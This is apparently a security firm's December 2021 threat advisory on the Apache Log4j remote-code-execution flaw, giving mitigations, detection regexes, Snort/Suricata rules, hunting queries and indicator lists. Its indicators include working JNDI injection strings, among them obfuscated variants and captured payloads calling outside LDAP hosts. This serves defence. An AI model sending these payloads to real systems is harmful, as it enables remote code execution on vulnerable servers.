Threat Advisory: Apache Log4j RCE – UPDATE

Dec 16, 2021
Written by Davinsi Labs

Scope of the vulnerability

A significant number of Java-based applications use log4j as their logging utility. Apache Log4j version 2 <=2.14.1 JNDI features used in configurations, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.

Versions Affected

  • All log4j-core versions >=2.0-beta9 and <=2.14.1
  • CVE Description Affected Versions
  • CVE-2021-44228 Apache Log4j RCE

Please note that also the version 2.15.0, under specific conditions, is vulnerable to DoS attacks ( CVE-2021-45046 ).

Not Affected

Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html ) protects against RCE by defaulting com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false.

Remediation

Upgrade to the latest version: Apache Releases Log4j. We recommend urgent patching using emergency patching procedures.

Mitigation

releases >=2.10

  • Set the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.

releases >=2.7 to <=2.14.1

  • All PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m.

releases >=2.0-beta9 and <=2.10.0

  • Remove the JndiLookup class from the classpath:
    zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

Detection

The bulk of attacks is related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers. An example pattern:

${jndi:ldap://[attacker site]/a}

Log4Shell exploitation can be detected through reverse proxy, WAF and web-server logs.

Monitor incoming web requests containing one of the following strings ‘ (“jndi” , “${::-”) ‘ which are allowed by your security appliance as a quick detection rule. Regex provided by CERT-EU can be utilized as well to take obfuscation into account, as seen for the following user agents in the IOC list below:

\ $ { ( \ $ { ( . * ? : | . * ? : . * ? : – ) ( ‘ | ” | ` ) * ( ? 1 ) } * | ( ‘ | ” | ` ) * } * ) { 9 , 1 1 }

If any matches are found, ensure to decode the base64 encoded payload (if present) and identify if a successful allowed connection to the IOC in the payload was seen. Whether or not an outbound connection from the source host was seen, we still recommend to take a look at the hunting methodologies below to identify any log4j post-exploitation activity.

Log4Shell exploitation can be detected through application logs.

Monitor application logs of devices vulnerable to log4j for the following signs of compromise:

  1. sun.jndi.
  2. com.sun.jndi.dns.DnsContext
  3. com.sun.jndi.ldap.LdapCtx
  4. Error looking up JNDI resource

Aside from this, WAF rules / Snort rules / Suricata rules based on the following source may also detect and prevent incoming Log4Shell attempts:

Furthermore, many security vendors have already created detection rules in order to detect and prevent Log4Shell exploitation. Contact your security vendors to receive a list of signatures already in place to detect related activity.

Security VendorLog4j-related Signatures
Palo Alto 91991, 91994, 91995, 92001
Checkpoint Mentioned in the Checkpoint logs as ‘ CVE-2021-44228 ‘
F5 200104768, 200104769, 200004450, 200004451, 200004474, 200104770, 200104771
Fortinet 121, 126

 

Hunting

Network logs and forward proxy logs come in handy to hunt for post-exploitation activity.

Davinsi Labs performs the following hunts in our SIEM solution:

Title Description
Outbound Connections to Probing Services – Web Requests Detects outbound connections to probing services, indicative that a system in your network has been scanned and is subsequently connecting back to a listening service. The list of probing services is currently based on the Log4Shell exploitation attempts.
Outbound Connections to Probing Services – DNS Query Detects outbound connections to probing services, indicative that a system in your network has been scanned and is subsequently connecting back to a listening services. The list of probing services is currently based on the Log4Shell exploitation attempts.
Outbound LDAP Traffic Detects outbound LDAP traffic based on firewall data sources.
Log4Shell related Base64 Encoded strings found This use cases detects base64 encoded strings found in payloads of exploits in regards to Log4Shell.
Log4Shell exception strings – Match on raw events This use cases detects exception strings indicating a successful Log4Shell payload.
Security Controls detecting Log4Shell exploitation attempts This use cases triggers on security controls alerting on Log4Shell exploitation attempts.
Blocked Log4Shell Exploit Attempts through iRule This use case detects blocked Log4Shell attempts through an iRule set by Davinsi Labs & Proximus.

 

As mentioned by NCC Group, you may also want to hunt for the following:

outbound network connections of LDAP, LDAPS, RMI, etc.

incoming Java requests.

YARA rules to hunt for Log4Shell can be found at:

Velociraptor artifacts to hunt for Log4Shell are also made public:

Snort / Suricata rules to hunt for Log4Shell (range 2034647-2034717) :

  1. alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)”; flow:established,to_server; content:”|24 7b|jndi|3a|ldap|3a 2f 2f|”; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034647; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  2. alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)”; flow:established,to_server; content:”|24 7b|jndi|3a|rmi|3a 2f 2f|”; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034648; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  3. alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)”; flow:established,to_server; content:”|24 7b|jndi|3a|ldap|3a 2f 2f|”; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034649; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  4. alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)”; flow:established,to_server; content:”|24 7b|jndi|3a|rmi|3a 2f 2f|”; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034650; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  5. alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)”; content:”|24 7b|jndi|3a|rmi|3a 2f 2f|”; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034652; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  6. alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)”; content:”|24 7b|jndi|3a|ldap|3a 2f 2f|”; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034651; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  7. alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)”; content:”|24 7b|jndi|3a|dns|3a 2f 2f|”; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034653; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  8. alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)”; flow:established,to_server; content:”|24 7b|jndi|3a|dns|3a 2f 2f|”; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034654; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  9. alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)”; flow:established,to_server; content:”|24 7b|jndi|3a|dns|3a 2f 2f|”; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034655; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  10. alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)”; content:”|24 7b|jndi|3a|ldaps|3a 2f 2f|”; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034656; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  11. alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)”; flow:established,to_server; content:”|24 7b|jndi|3a|ldaps|3a 2f 2f|”; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034657; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  12. alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)”; flow:established,to_server; content:”|24 7b|jndi|3a|ldaps|3a 2f 2f|”; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034658; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)

Indicators of Compromise:

A list of log4j obfuscations seen throughout our customers up until now:

  1. ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://
  2. ${jndi:ldap:
  3.  ${jndi:${lower:l}${lower:d}a${lower:p}://
  4. ${jndi:ldaps://
  5. ${jndi:dns://
  6. Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@${jndi:ldap://User-Agent.redacted.be.jg33feb5c7b2ui8djt4bb9dntez6nv.burpcollaborator.net/a.bc
  7. xaKfGZMajk${jndi:ldap://101.99.94.69:80/GUnkoPPRrd}YxlzipjELu

A list of probing services we have identified throughout our customers up until now:

  1. interactsh[.]com
  2. interact[.]sh
  3. requestbin[.]net
  4. dnslog[.]cn
  5. leakix[.]net
  6. bingsearchlib[.]com
  7. xf[.]world80[.]log4j[.]bin
  8. scanworld[.]net
  9. canarytokens[.]com

A list of known IOC’s we have identified throughout our customers up until now:

  1. 62[.]210[.]130[.]250
  2. 45[.]155[.]205[.]233
  3. 193[.]191[.]216[.]16
  4. 134[.]238[.]140[.]74
  5. 134[.]238[.]143[.]5
  6. 134[.]238[.]50[.]4
  7. 134[.]238[.]50[.]42
  8. 208[.]127[.]124[.]150
  9. 208[.]127[.]140[.]40
  10. 193[.]191[.]208[.]131
  11. 193[.]191[.]208[.]132
  12. 185[.]119[.]156[.]42
  13. 185[.]119[.]156[.]41
  14. 185[.]134[.]25[.]38
  15. 195[.]54[.]160[.]149
  16. 162[.]55[.]90[.]26
  17. 162[.]55[.]90[.]26
  18. 104[.]237[.]147[.]99
  19. 193[.]3[.]19[.]159
  20. 45[.]83[.]193[.]150
  21. 135[.]148[.]143[.]217
  22. 167[.]71[.]13[.]196
  23. ryedge[.]io
  24. automationyesterday[.]com
  25. leakix[.]net
  26. interactsh[.]com
  27. interact[.]sh
  28. eg0[.]ru
  29. kryptoslogic-cve-2021-44228[.]com

Vulnerability Identification

Our Rapid7 InsightVM customers can now detect the vulnerability via authenticated, agent-based, container, and unauthenticated scans. Rapid7 has released a vulnerability check with identifier `apache-log4j-core-cve-2021-44228` and `apache-log4j-core-cve-2021-44228-remote`via a content update on December 12, 2021. This is an authenticated check, which uses the `find` command on Unix-like systems to identify vulnerable versions of the Log4j JAR files.

Please note that this new check will require the Security Console and Scan Engine to be updated to version 6.6.118, also released on December 12, and will not be functional with the content-only release. This will require Consoles and Engines to be restarted.

This unauthenticated check runs during network scans and will attempt to trigger a connection back to the Scan Engine in order to determine vulnerable status. It is platform-independent, targeting Windows, Linux, and other operating systems.

The InsightVM product itself uses a log4j library, but not the vulnerable library of Apache.

Threat advisory updates

This blog post will be continuously updated in case new findings are published.

Reach out to info@davinsi.com if you need any assistance from our team of security experts.

We hope the following threat advisory assists to react quickly to ongoing threats and urges the need for patching and security monitoring.

Read the previous version: Threat Advisory: Apache Log4j RCE

References

Share this news